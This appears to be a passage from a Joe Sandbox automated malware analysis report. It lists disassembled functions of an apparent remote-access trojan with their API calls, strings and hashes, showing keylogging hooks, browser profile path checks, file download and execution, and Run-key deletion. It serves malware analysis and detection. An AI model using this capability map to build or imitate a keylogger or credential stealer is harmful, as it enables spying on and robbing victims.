                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _wcslen$CloseCreateValue
                                                                                          • String ID: !D@$okmode
                                                                                          • API String ID: 3411444782-1942679189
                                                                                          • Opcode ID: bbd17316e02ab87431fe8abe2f6f4f57bb2f26a84c7141214b75d0818d7c1fed
                                                                                          • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                                                          • Opcode Fuzzy Hash: bbd17316e02ab87431fe8abe2f6f4f57bb2f26a84c7141214b75d0818d7c1fed
                                                                                          • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                                                          Function 00418BCA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BE5
                                                                                            • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418C0A
                                                                                            • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                            • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                          • String ID: image/png
                                                                                          • API String ID: 1291196975-2966254431
                                                                                          • Opcode ID: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                          • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                                                                                          • Opcode Fuzzy Hash: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                          • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                                                                                          Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                          • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                                          Strings
                                                                                          • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LocalTime
                                                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                                                          • API String ID: 481472006-1507639952
                                                                                          • Opcode ID: c39db9322a8ab698ab6c6fe4d517d63c6f84dc46af59211586e7c92f61b52e84
                                                                                          • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                                                          • Opcode Fuzzy Hash: c39db9322a8ab698ab6c6fe4d517d63c6f84dc46af59211586e7c92f61b52e84
                                                                                          • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                                                          Function 00416676 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Sleep.KERNEL32 ref: 0041667B
                                                                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DownloadFileSleep
                                                                                          • String ID: !D@
                                                                                          • API String ID: 1931167962-604454484
                                                                                          • Opcode ID: 9cbcf339d5782d21f0009647a5314bbf722ddb95791e80143436529d650ea742
                                                                                          • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                                                          • Opcode Fuzzy Hash: 9cbcf339d5782d21f0009647a5314bbf722ddb95791e80143436529d650ea742
                                                                                          • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                                                          Function 0041B580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LocalTime
                                                                                          • String ID: | $%02i:%02i:%02i:%03i
                                                                                          • API String ID: 481472006-2430845779
                                                                                          • Opcode ID: 4182ea60a7d59cd3c4daa7da87bafc9d2ec88e2c779713b19cbff176a10afb6b
                                                                                          • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                                                          • Opcode Fuzzy Hash: 4182ea60a7d59cd3c4daa7da87bafc9d2ec88e2c779713b19cbff176a10afb6b
                                                                                          • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                                                          Function 0040B08C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                          • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                                          • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                          • String ID: Online Keylogger Stopped
                                                                                          • API String ID: 1623830855-1496645233
                                                                                          • Opcode ID: 1a9fb93e295ecde7430af69949d9fcd4e66a132cb674e587e4338cf96b5e1dd8
                                                                                          • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                                                          • Opcode Fuzzy Hash: 1a9fb93e295ecde7430af69949d9fcd4e66a132cb674e587e4338cf96b5e1dd8
                                                                                          • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                                                          Function 00448B66 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LocaleValid
                                                                                          • String ID: IsValidLocaleName$kKD
                                                                                          • API String ID: 1901932003-3269126172
                                                                                          • Opcode ID: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                                                          • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                                                          • Opcode Fuzzy Hash: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                                                          • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                                                          Function 0040C4FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExistsFilePath
                                                                                          • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                          • API String ID: 1174141254-4188645398
                                                                                          • Opcode ID: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                          • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                                                          • Opcode Fuzzy Hash: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                          • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                                                          Function 0040C561 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExistsFilePath
                                                                                          • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                          • API String ID: 1174141254-2800177040
                                                                                          • Opcode ID: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                                          • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                                                          • Opcode Fuzzy Hash: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                                          • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                                                          Function 0040C5C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExistsFilePath
                                                                                          • String ID: AppData$\Opera Software\Opera Stable\
                                                                                          • API String ID: 1174141254-1629609700
                                                                                          • Opcode ID: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                          • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                                                          • Opcode Fuzzy Hash: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                          • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                                                          Function 0040B681 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetKeyState.USER32(00000011), ref: 0040B686
                                                                                            • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                                                            • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                            • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                                                            • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                            • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                                                            • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                                                            • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                          • String ID: [AltL]$[AltR]
                                                                                          • API String ID: 2738857842-2658077756
                                                                                          • Opcode ID: f508c8d0c28e71ac455fa2a77041b079ca691cd00d60daeee8bf3b3b3c4de222
                                                                                          • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                                                          • Opcode Fuzzy Hash: f508c8d0c28e71ac455fa2a77041b079ca691cd00d60daeee8bf3b3b3c4de222
                                                                                          • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                                          Function 004161C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExecuteShell
                                                                                          • String ID: !D@$open
                                                                                          • API String ID: 587946157-1586967515
                                                                                          • Opcode ID: 33d0e39c2c5277f948c9383974d65c92f33d2ad08035dd6aa383958bc01fb2b1
                                                                                          • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                                          • Opcode Fuzzy Hash: 33d0e39c2c5277f948c9383974d65c92f33d2ad08035dd6aa383958bc01fb2b1
                                                                                          • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                                          Function 0040B6DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: State
                                                                                          • String ID: [CtrlL]$[CtrlR]
                                                                                          • API String ID: 1649606143-2446555240
                                                                                          • Opcode ID: 1ad9dfb3c513a634c020206c6c5afe09b5350a38294d89605c778c55c0391829
                                                                                          • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                                          • Opcode Fuzzy Hash: 1ad9dfb3c513a634c020206c6c5afe09b5350a38294d89605c778c55c0391829
                                                                                          • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                                          Function 0040E7DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                          • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Init_thread_footer__onexit
                                                                                          • String ID: ,kG$0kG
                                                                                          • API String ID: 1881088180-2015055088
                                                                                          • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                                          • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                                                          • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                                          • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                                                          Function 00413A5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D17F,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A6C
                                                                                          • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A80
                                                                                          Strings
                                                                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteOpenValue
                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                          • API String ID: 2654517830-1051519024
                                                                                          • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                          • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                                                          • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                          • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                                                          Function 0040B8A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                                                          • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteDirectoryFileRemove
                                                                                          • String ID: pth_unenc
                                                                                          • API String ID: 3325800564-4028850238
                                                                                          • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                          • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                                                          • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                          • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                                                          Function 0041288B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                          • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ObjectProcessSingleTerminateWait
                                                                                          • String ID: pth_unenc
                                                                                          • API String ID: 1872346434-4028850238
                                                                                          • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                          • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                                                          • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                          • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                                                          Function 0041BB77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CountInfoInputLastTick
                                                                                          • String ID: NG
                                                                                          • API String ID: 3478931382-1651712548
                                                                                          • Opcode ID: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                                                                          • Instruction ID: 91b37e9d9b7f8f393223e5bf0be67cbbeb1ccf95644ad96dbec1e326022f3834
                                                                                          • Opcode Fuzzy Hash: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                                                                          • Instruction Fuzzy Hash: 84D0C97180060CABDB04AFA5EC4D99DBBBCEB05212F1042A5E84992210DA71AA548A95
                                                                                          Function 00440CE1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                                                          • GetLastError.KERNEL32 ref: 00440D85
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 1717984340-0
                                                                                          • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                          • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                                                          • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                          • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                                                          Function 00411B9A Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                                                          • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                                                          • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLastRead
                                                                                          • String ID:
                                                                                          • API String ID: 4100373531-0
                                                                                          • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                          • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
